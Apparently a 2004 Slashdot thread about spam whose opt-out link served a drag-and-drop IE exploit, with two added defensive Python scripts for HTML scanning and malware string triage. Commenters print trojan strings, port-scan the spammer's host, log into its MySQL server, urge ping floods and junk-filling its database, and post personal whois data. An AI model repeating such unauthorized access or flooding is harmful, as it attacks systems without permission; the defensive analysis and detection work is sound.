Spam Opt-out Link Triggers Malicious Code Attack 327
Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site that, when the user scrolls the page, triggers a drag-and-drop JavaScript exploit. Scarily, the E-mail actually complies with the CAN-SPAM act, as it only requires spammers to put an opt-out link in their mailings. As The Reg says, "It comes as little surprise that this feature has been taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in question points to www. xcelent.biz (as in The Reg story, space intentionally included), so even if you can't block the mail yet, it should be easy to block access to the site with the exploit. I suspect this is just the beginning, and most spam will include "features" such as this in the near future."
devious (Score:4, Informative)
MOD PARENT (with malicious address) DOWN! (Score:2, Insightful)
But then again . . . (Score:5, Insightful)
Re:But then again . . . (Score:5, Informative)
http://www.xcelent.biz/d/ [xcelent.biz] is a link to another page in that domain. Also has more graphics for better slashdotting potential.
P.S. Still be careful. They could always move the pages around.
Re:MOD PARENT (with malicious address) DOWN! (Score:3, Insightful)
Microsoft says "No Problem" (Score:5, Funny)
I mean, using a scrollbar. Come on, what kind of ignorant user is going to use a scrollbar on a site they don't trust?
Re:Microsoft says "No Problem" (Score:5, Informative)
The idea is that all the website designer has to do is make an image that LOOKS like a scrollbar. The user goes and clicks and drags it to scroll down, not knowing it's fake. If there is a DYNSRC="..." attribute specified in the <IMG...> tag, Internet Explorer downloads and runs whatever program is specified, without any kind of prompt whatsoever.
Even with SP2 installed.
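The two comments above describe the ingredients of the trick: a proprietary DYNSRC attribute on an image, and the shell: URL scheme used from script. Both are things a mail gateway or proxy can simply refuse to pass. The scanner below is an added example written for this page, not code from the thread or from any product mentioned in it; it uses only the standard library, and the four sample documents at the bottom are constructed for illustration (example.invalid is a reserved placeholder host, and "shell:example" stands in for any shell: URL).

```python
"""Flag HTML that relies on the IE-only DYNSRC attribute or on shell:-style URLs.

Added example for a mail gateway or web proxy content check; it is not code
from the Slashdot thread or from any product mentioned there. The sample
documents at the bottom are constructed for illustration.
"""
from html.parser import HTMLParser

# Attributes whose value names a resource the browser may fetch or launch.
URL_ATTRS = {"dynsrc", "src", "lowsrc", "href", "data", "action", "background"}
# URL schemes that hand control to something other than the HTTP stack.
RISKY_SCHEMES = ("shell:", "javascript:", "vbscript:", "file:")


def _norm(value):
    """Lower-case a URL and drop whitespace/control characters used to pad a scheme."""
    return "".join(ch for ch in value if ch > " ").lower()


class RiskyMarkupScanner(HTMLParser):
    """Collects (kind, tag, value) findings while parsing one document."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            if value is None:
                continue
            if name == "dynsrc":
                # DYNSRC is a proprietary IE extension; legitimate mail has no use for it.
                self.findings.append(("dynsrc", tag, value))
            elif name in URL_ATTRS and _norm(value).startswith(RISKY_SCHEMES):
                self.findings.append(("risky-scheme", tag, value))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script that builds a shell: URL at run time.
        if self._in_script and "shell:" in _norm(data):
            self.findings.append(("shell-in-script", "script", data.strip()[:80]))


def scan_html(text):
    """Return the list of findings for one HTML document (empty when clean)."""
    scanner = RiskyMarkupScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


def is_suspicious(text):
    """Gateway decision: anything flagged means quarantine or strip the HTML part."""
    return bool(scan_html(text))


# Constructed samples (not taken from the spam discussed in the thread).
FAKE_SCROLLBAR = ('<html><body><img src="scrollbar.gif" '
                  'dynsrc="http://example.invalid/update.exe"></body></html>')
SHELL_LINK = '<a href=" SHELL:example ">click here to remove</a>'
SCRIPT_SHELL = '<script>location.href = "shell:example";</script>'
CLEAN = '<p>Hi <a href="https://example.invalid/unsubscribe">unsubscribe</a></p>'

if __name__ == "__main__":
    for name, doc in [("fake scrollbar", FAKE_SCROLLBAR), ("shell link", SHELL_LINK),
                      ("inline script", SCRIPT_SHELL), ("clean", CLEAN)]:
        print(f"{name:14s} -> {scan_html(doc)}")
```

The attribute check normalises the value before comparing so that leading whitespace or a mixed-case scheme does not slip past; the same normalisation is applied to inline script text, which is where the thread's exploit actually invokes shell:. A real gateway would run this over every text/html MIME part rather than over a whole message.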
Re:Microsoft says "No Problem" (Score:2, Informative)
Re:Microsoft says "No Problem" (Score:5, Interesting)
For the curious, here is an interesting post [seclists.org] that describes the exploit at some length. Essentially, it uses an HTML 'dynsrc' attribute (proprietary Microsoft extension) to allow IE to download the executable, and javascript to use the 'shell:' protocol to execute it. It's not a particularly new flaw, but this is the slickest exploit of it I've seen.
Re:Microsoft says "No Problem" (Score:3, Funny)
I dont know about you (Score:5, Informative)
Re:I dont know about you (Score:2)
Seriously though, I've seen computers bought less than a month previously that ALREADY have their subscription expired due to the length of time the computer sat at the store; it's not surprising to think that even new-ish computers might not have either the patch or the virus defs.
Re:I dont know about you (Score:2)
Re:I dont know about you (Score:5, Informative)
GetSystemDirectoryA, xProxyBot v 1.0.0, 1.0.0 , w32.exe,
Windows Service Application, www.earthlabs.biz,
sockproxy/rec.php.
Software\
Software\Microsoft\Windows\CurrentVersion\RunServices
%s?&p=%d&v=%s
VisitW
SYSTEM\CurrentControlSet\Control\SafeBoot\
explorer.exe
Mozilla/4.0 (compatible)
InternetCloseHandle, InternetGetLastResponseInfoA
InternetReadFile, InternetCrackUrlA
InternetOpenUrlA
InternetOpen
FtpPutFileA, FtpGetFileA
HttpSendRequestA, HttpOpenRequestA
InternetGetConnectedStateEx, InternetGetConnectedState
interesting strings (Score:3, Informative)
Re:interesting strings (Score:2, Informative)
Scan engine v4.3.20 for Linux.
Virus data file v4394 created Sep 22 2004
Identified it as:
$ uvscan --secure windows-update32.exe
/home/recall/windows-update
Found the BackDoor-CHP trojan !!!
More Legislation Needed. (Score:3, Insightful)
Re:More Legislation Needed. (Score:4, Insightful)
Also, from past experience, legislation is often abused in computer cases (as demonstrated by people like the RIAA). Personally, it's been pretty rare to see decent laws against computer crimes (I haven't heard of any I agree with so far).
I think the development of sender verification frameworks for Email will also eventually help, provided that MS is willing to accept the open standards for once.
Re:More Legislation Needed. (Score:4, Insightful)
Re:More Legislation Needed. (Score:5, Insightful)
It's not specifically illegal under the CAN-SPAM act, but it's just as illegal as any other exploit, trojan or worm.
Re:More Legislation Needed. (Score:2)
Are you sure about that?
Assent means To agree, as to a proposal; concur. - http://dictionary.reference.com/search?q=assent
Re:More Legislation Needed. (Score:4, Insightful)
Obviously people here are aware that the site is bad. However, people who actually get the link in an email would be under the impression that the site is an opt-out link. Providing them a virus instead is fraud and illegal.
If "known to be bad" refers to IE, that doesn't excuse anything. That's like saying that if you forget to lock your door, then it's all right for people to steal your stuff. In reality, it's still just as illegal.
Re:More Legislation Needed. (Score:5, Insightful)
If the IRS started auditing every known spammer with operations or residence in the United States, that would have a very chilling effect on spam. I'd bet my life savings that spammers don't report all of their income for tax purposes. If other countries then followed suit, spam would be relegated to the far corners of the world and easily firewalled.
The Final Solution to Spam (Score:3, Funny)
Another good reason... (Score:3, Insightful)
Re:Another good reason... (Score:4, Funny)
No. A good reason to hire a Spammer Assassin, perhaps.
Violent, painful death is, after all, the only thing these sleazeballs fear.
Re:Another good reason... (Score:2)
Greeting from Malaysia (Score:5, Funny)
Re:Greeting from Malaysia (Score:3, Informative)
Yu, Shao
4F, No. 7, Aly. 7, Lane 355, Sec. 2, Neihu Rd.
Taipei City
TW
Shao Yu (SY167-TW) hn87788676@hn.hinet.net
+886-9-36-045496
Re:Greeting from Malaysia (Score:2)
Country: TW
Netname: YU-SHAO-E4-TW
Descr: CHTD, Chunghwa Telecom Co., Ltd.Data-Bldg. 6F, No. 21, Sec. 21, Hsin-Yi
Rd.,Taipei Taiwan
Status: ASSIGNED NON-PORTABLE
Source: TWNIC
Server: APNIC
Inetnum: 61.218.79.48 - 61.218.79.63
Dumb (Score:5, Funny)
Re:Dumb (Score:5, Informative)
Why is the site still up? (Score:5, Insightful)
I realize that another spammer will take advantage of the hole next week, but if the hosters were blacklisted from DNS servers, the offending files might get removed a little faster.
Re:Why is the site still up? (Score:5, Funny)
1. Law enforcement agencies asked to keep it up
2. Hinet Taiwan doesn't give a shit
I'm betting on option #2.
Re:Why is the site still up? (Score:2)
That would take time. It's much quicker and easier to just slashdot the site.
Simple really... (Score:3, Informative)
Useful slashdotting!! (Score:4, Funny)
There should be a real link, in order to
Re:Useful slashdotting!! (Score:2)
Re:Useful slashdotting!! (Score:2)
Re:Useful slashdotting!! (Score:2)
Hazardous link (Score:5, Informative)
Of course, anyone who installs that on a non-isolated, non-virtual machine pretty much deserves the results. It looks like it has the standard "Software\Microsoft\Windows\CurrentVersion\Run", "Software\Microsoft\Windows\CurrentVersion\RunServices", and "SYSTEM\CurrentControlSet\Control\SafeBoot\" registry hooks. (Unix "strings" is your friend....)
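The "strings is your friend" remark above, together with the string dump posted earlier in the thread, is the whole of a first-pass static triage: pull out the printable runs and look for autostart registry paths, WinINet imports and hostnames. The script below is an added example written for this page, not code from the thread or from any antivirus product. SAMPLE_BLOB is a constructed byte string that embeds the kinds of strings quoted in the thread (the RunServices and SafeBoot keys, the www.earthlabs.biz host, two WinINet API names); it is not the trojan itself, and the verdict rule at the end is this example's own heuristic.

```python
"""Extract printable strings from a binary and flag autostart and network indicators.

Added triage example in the spirit of the "strings is your friend" remark; it is
not code from the thread or from any antivirus product. SAMPLE_BLOB is a
constructed byte string carrying the kinds of strings posted in the thread,
not the actual trojan.
"""
import re

MIN_LEN = 6

# Registry paths that make a program start with Windows (or survive Safe Mode).
PERSISTENCE_MARKERS = (
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"SYSTEM\CurrentControlSet\Control\SafeBoot",
)
# WinINet API names that show the program carries its own HTTP/FTP client.
NETWORK_APIS = {
    "InternetOpen", "InternetOpenUrlA", "InternetReadFile", "InternetCrackUrlA",
    "HttpOpenRequestA", "HttpSendRequestA", "FtpPutFileA", "FtpGetFileA",
}
HOST_RE = re.compile(r"\bwww\.[a-z0-9.-]+\.[a-z]{2,}\b", re.I)


def _squash(s):
    """Case-fold and drop whitespace so keys split by extraction or padding still match."""
    return "".join(s.split()).lower()


def extract_strings(blob, min_len=MIN_LEN):
    """Return printable-ASCII runs of at least min_len bytes, in file order."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def triage(blob):
    """Summarise one binary's strings into persistence, network and host indicators."""
    strings = extract_strings(blob)
    persistence = [s for s in strings
                   if any(_squash(m) in _squash(s) for m in PERSISTENCE_MARKERS)]
    network = sorted({s.strip() for s in strings if s.strip() in NETWORK_APIS})
    hosts = sorted({h.lower() for s in strings for h in HOST_RE.findall(s)})
    user_agents = [s for s in strings if s.startswith("Mozilla/")]
    return {
        "strings": len(strings),
        "persistence": persistence,
        "network": network,
        "hosts": hosts,
        "user_agents": user_agents,
        # Autostart hooks plus a built-in HTTP client is the classic bot/downloader shape;
        # this verdict rule is the example's own heuristic, not a vendor signature.
        "suspicious": bool(persistence) and bool(network),
    }


# Constructed sample: a few bytes of header-like noise around strings of the
# kind quoted in the thread. It is not the real file.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff"
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\x00"
    + b"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\\x00"
    + b"www.earthlabs.biz\x00sockproxy/rec.php\x00%s?&p=%d&v=%s\x00"
    + b"InternetOpenUrlA\x00HttpSendRequestA\x00Mozilla/4.0 (compatible)\x00"
    + b"\x01\x02ab\x03"
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_BLOB).items():
        print(f"{key:12s}: {value}")
```

To use it on a real sample, read the file in binary mode and pass the bytes to triage(); do that on an isolated analysis box, for the reason the comment above gives. The whitespace-tolerant comparison matters because the strings posted in the thread arrived with spaces inserted mid-key, which a plain substring match would miss.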
Use your powers for good (Score:5, Interesting)
Re:Use your powers for good (Score:3, Informative)
Re:Use your powers for good (Score:2)
Re:Use your powers for good (Score:2)
Re:Use your powers for good (Score:5, Funny)
(click link below to show link...)
Re:Use your powers for good (Score:2)
Or better yet, do... it'll increase the traffic to the site
Re:Use your powers for good (Score:2)
sudo ping -f www.xcelent.biz (I never knew ping flooding required superuser privileges)
Even better - choose a link with graphics on. (Score:5, Informative)
a [xcelent.biz] b [xcelent.biz] c [xcelent.biz] d [xcelent.biz]. "d" looks pretty heavy on graphics.
.02
cLive ;-)
Re:Even better - choose a link with graphics on. (Score:3, Insightful)
Don't forget the good services of SSL.
You should use https for everything so that you get a [xcelent.biz] b [xcelent.biz] c [xcelent.biz] d [xcelent.biz]
Re:Even better - choose a link with graphics on. (Score:2)
Re:Even better - choose a link with graphics on. (Score:2)
At last, a good use for these useless scripts I have to bother my friends
No it hasn't, MOD TROLL (Score:2)
cLive
New News? (Score:5, Informative)
Re:New News? (Score:2)
Of course, now that we have HTML email with IMG tags (whoopee.) you don't even need to click on a link anymore.
Re:New News? (Score:2)
Most people don't ever click on the opt-out link for that exact reason. The fact that someone has made it even more dangerous to do so just proves the point.
As long as they can keep saying "but you haven't opted out" they're safe.
lamer is hosted on hinet.com (Score:5, Informative)
www.xcelent.biz has address 61.218.79.53
host 61.218.79.53
53.79.218.61.in-addr.arpa domain name pointer 61-218-79-53.HINET-IP.hinet.net
and people wonder why I firewall 60/7
MIME Defang (Score:3, Informative)
I hate spam, but I haven't had a false positive or negative in forever combining the bayes inside spamassassin with the bayes inside thunderbird.
Chris
Re:MIME Defang (Score:3, Informative)
That is mostly the way I use it: disabling HTML, checking attached files for viruses, and the Windows executable extensions that passed the antivirus check get renamed anyway to make them not executable without strong user action. Attached HTML pages sometimes don't look/work as desired, bu
Exploit (Score:5, Informative)
interesting ports on the spammer's site (Score:5, Interesting)
Interesting ports on 61-218-79-53.HINET-IP.hinet.net (61.218.79.53):
(The 1651 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
135/tcp filtered msrpc
443/tcp open https
445/tcp filtered microsoft-ds
3306/tcp open mysql
6000/tcp open X11
Nmap run completed -- 1 IP address (1 host up) scanned in 54.453 seconds
Re:interesting ports on the spammer's site (Score:4, Interesting)
Trying 61.218.79.53...
Connected to 61-218-79-53.HINET-IP.hinet.net.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.5p1
Hmm.. Isn't 3.5p1 vulnerable to some exploit? Not that I'm implying anything!
Re:interesting ports on the spammer's site (Score:3, Funny)
That AC is not me.
*runs*
Re:interesting ports on the spammer's site (Score:5, Interesting)
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 658 to server version: 3.23.54
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+-----------------+
| Database        |
+-----------------+
| earth_bizzads   |
| herbalmarketing |
| mysql           |
+-----------------+
3 rows in set (0.45 sec)
mysql>
Re:interesting ports on the spammer's site (Score:3, Interesting)
Interesting, one of the string literals in the downloaded binary [slashdot.org] is "www.earthlabs.biz/sockproxy/rec.php", a database of infected clients perhaps?
Re:interesting ports on the spammer's site (Score:5, Funny)
Re:interesting ports on the spammer's site (Score:3, Informative)
mysql> show databases;
(snipped thanks to lameness filter)
4 rows in set (11.56 sec)
mysql> use test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
How about? (Score:2)
We could populate that sucker with crap records for eternity and fill his HDD...
I can't do it right now because I'm at work... how about somebody with 'leet mySQL hacking skills that's at home right now?
Re:interesting ports on the spammer's site (Score:3, Informative)
Interestingly they never disabled the default "test" user for MySQL. Not that much can be done (user "test" has no privileges on any databases) but I was in fact able to log in...
Re:interesting ports on the spammer's site (Score:2, Informative)
The only thing I click on in a Sapm is... (Score:2, Informative)
The only thing you should be clicking on, in a spam message, is the delete icon/key.
Re:The only thing I click on in a Sapm is... (Score:2)
Or, if you've got a training spam filter, the "Mark as Spam" button.
A SPAM opt-out trojan... (Score:3, Insightful)
CAN-SPAM may require an opt-out option in the e-mail to remain legal. However, the legislation DOESN'T protect you from the consequences of using that opt-out option.
It's legislated social engineering at its finest. Good luck out there.
Not Surprising (Score:2, Insightful)
Politicos without "tech savvy" - 0
This is the way it will always be unfortunately. Unless the whole population eventually can understand all the technical aspects of computers and the internet, or computers and the internet become so rock solid/secure AND easy to use, it will always be this way.
Javascript console (Score:2, Interesting)
Error: unterminated string literal Source File: http://focusin.ads.targetnet.com//ad/id=dmitryivanov&opt=hjj&rw=468&rh=60&cv=220&uid=673475 Line: 3, Column: 17 Source Code: document.writeln('
Error: newPopup has no properties Source File: http://mediamgr.ugo.com/js.ng/Network=ugo&size=1x1&adtype=over&affiliate=ultimate-guitar&suba=ultimate-guitar&channel=music&subchannel=tic&category=tic&PT=ct
send it to the MCSE boys (Score:4, Funny)
Slightly OT-Malicious spam opt-outs and MYPOINTS (Score:4, Interesting)
Since then I'm getting a LOT of spam, I received none prior. All have the same recipient name as the Mypoints mail and some other common characteristics, but none of the opt-out stuff. Thankfully, gmail is autofiltering them without any need for intervention, but I can't help but feel MyPoints are behind it.
Has anyone else had the same thing happen?
Well I went to look at the virus (Score:3, Informative)
Didn't get that far. Just loading the page launched it. Anti-virus kicked in with a warning, home page was attempted to change, and then I got a call from headquarters to follow the delousing drill, since they also get all of our warnings.
Well that was fun. Didn't get to see any scroll bar :(
Windows 2000 - IE 5.50.4807.2300
Re:Well I went to look at the virus (Score:3, Informative)
The JS code scrolls the page for you, instead of the actual scroll bar. Since you're scrolling the page (via JavaScript), the real scroll bar reflects the new page position, making you think you actually were dragging the scroll bar.
as you learned, the code does
Win32.Sokeven.D (Score:2, Informative)
Added to Computer Associates database 9/21/04
What do other vendors call this?
Why is this a surprise? (Score:5, Insightful)
It's not like spammers are a class of people to be trusted. I always felt the opt-out requirement was a joke and prime for abuse. By opting out, you are telling the spammer that you read every email that comes your way, and they add it to their list of email addresses that actually respond to spam.
So what do they do with this list? If they follow the letter of the law, they will stop spamming - but, they have a list of high quality email IDs that they can sell to other spammers.
Users should always follow these simple instructions with regards to email spam:
1. Make sure you have an incoming mail spam filter, like SpamAssassin.
2. Delete any spam that gets through.
3. If you are interested in the product, do not contact the email (spam) source, reply to the email, or click on "helpful" buttons. Find reputable mainstream vendors - if it's great then Wal-Mart, Best Buy, Circuit City, etc. will stock it.
myke
Re:Why is this a surprise? (Score:2)
If you are interested, buy from a competitor. Note that under your system, it still makes sense for a manufacturer (e.g. the makers of Cialis, Levitra, or herbal substitutes) to support spam (either directly or through dealer incentives). E.g. if someone spams you to bu
Why? (Score:2)
Why, exactly, is anybody reading SPAM? It is not like you cannot tell just by looking at the subject and the From line.
Secondly, why are people viewing emails as anything but text?
Hasn't this always been the case? (Score:2)
How many people really trust spammers to honor an opt-out?
Other sites on same server doing the same thing. (Score:5, Informative)
YARTNUIE (Score:2, Redundant)
Another
Reason
To
Not
Use
Internet
Exp
Your sig (Score:2)
Quick .EXE Analysis (Score:4, Interesting)
Some other strings give a few clues about what it does:
I just got exploited (Score:3, Informative)
But the exploit worked!! I was expecting to get a pop-up from NAV with an exciting alarm sound
(Un)Fortunately, since it worked, now I know what it does:
1) Add the windows-update.exe to the startup folder
2) Add a new file cmd.dat to the startup folder.
Anyway, since I had gone so far, I tried running the Windows-update, but that gave me the error that it was not a valid exe file. I ran it in the protected mode (available when you select "Run as..." in Win XP). Then I renamed the dat file to
BTW, if anyone else has tried it out and knows about something else that should be done, please let me know. And does anyone have a clue why NAV does not detect this?? Maybe you need to activate it for IE or make IE the default browser???
Disable Javascript and Java (Score:2)
Bottom line: EXECUTING FOREIGN COMPUTER CODE (be it Javascript or Java) IS A POTENTIAL HAZARD. Solution: Disable the execution of such code in your browser. Don't reactivate it until providers (of Javascript or Java) allow you to sue them for liability). Until then they don't trust their own co
Can't we just deal with this already (Score:3, Interesting)
I figure 10, 20 thousand of these losers tops and the problem will go away.
Re:Can't we just deal with this already (Score:3, Insightful)
I figure 10, 20 thousand of these losers tops and the problem will go away.
While I appreciate the sentiment (personally I'm thinking boiling oil would be appropriate for spammers) I doubt it'd help. Even with the de
Test new Spamassasin 3.0.0 against this! (Score:3, Insightful)
PCB$@#
And people say ICANN is worthless... (Score:3, Interesting)
Thank you ICANN! :)
I block all .biz (Score:3, Interesting)
get over it.
Fill his database (Score:5, Interesting)
Re:Fill his database (Score:3, Informative)
DNS trace - Lets give the address' owner a call (Score:4, Informative)
Domain Name: XCELENT.BIZ
Domain ID: D7752456-BIZ
Sponsoring Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Domain Status: clientTransferProhibited
Registrant ID: CNEU-105661
Registrant Name: Anandan Krishan
Registrant Organization: Iscon & Krishan
Registrant Address1: Suite 50-12
Registrant Address2: Jalan Yap Kwan Seng.
Registrant City: Kuala Lumpur
Registrant State/Province: KL
Registrant Postal Code: 50450
Registrant Country: Malaysia
Registrant Country Code: MY
Registrant Phone Number: +603.27756842
Registrant Facsimile Number: +603.27756642
Registrant Email: win2save@yahoo.com
Administrative Contact ID: CNEU-105617
Administrative Contact Name: Anandan Krishan
Administrative Contact Organization: Iscon & Krishan
Administrative Contact Address1: Suite 50-12
Administrative Contact Address2: Jalan Yap Kwan Seng.
Administrative Contact City: Kuala Lumpur
Administrative Contact State/Province: KL
Administrative Contact Postal Code: 50450
Administrative Contact Country: Malaysia
Administrative Contact Country Code: MY
Administrative Contact Phone Number: +603.27756842
Administrative Contact Facsimile Number: +603.27756642
Administrative Contact Email: win2save@yahoo.com
Billing Contact ID: CNEU-105617
Billing Contact Name: Anandan Krishan
Billing Contact Organization: Iscon & Krishan
Billing Contact Address1: Suite 50-12
Billing Contact Address2: Jalan Yap Kwan Seng.
Billing Contact City: Kuala Lumpur
Billing Contact State/Province: KL
Billing Contact Postal Code: 50450
Billing Contact Country: Malaysia
Billing Contact Country Code: MY
Billing Contact Phone Number: +603.27756842
Billing Contact Facsimile Number: +603.27756642
Billing Contact Email: win2save@yahoo.com
Technical Contact ID: CNEU-105617
Technical Contact Name: Anandan Krishan
Technical Contact Organization: Iscon & Krishan
Technical Contact Address1: Suite 50-12
Technical Contact Address2: Jalan Yap Kwan Seng.
Technical Contact City: Kuala Lumpur
Technical Contact State/Province: KL
Technical Contact Postal Code: 50450
Technical Contact Country: Malaysia
Technical Contact Country Code: MY
Technical Contact Phone Number: +603.27756842
Technical Contact Facsimile Number: +603.27756642
Technical Contact Email: win2save@yahoo.com
Name Server: NS1.GRAITHBOADER.BIZ
Name Server: NS2.GRAITHBOADER.BIZ
Name Server: NS2.TIKONDES.BIZ
Created by Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Last Updated by Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Domain Registration Date: Wed Sep 15 03:53:27 GMT 2004
Domain Expiration Date: Wed Sep 14 23:59:59 GMT 2005
Domain Last Updated Date: Wed Sep 15 04:03:16 GMT 2004
Re:Why oh why (Score:2)
I didn't see mention of 'arab' in there.
More seriously, doesn't this gel slightly with the Windows EULA?
Re:Refresh Every Minute (Score:2)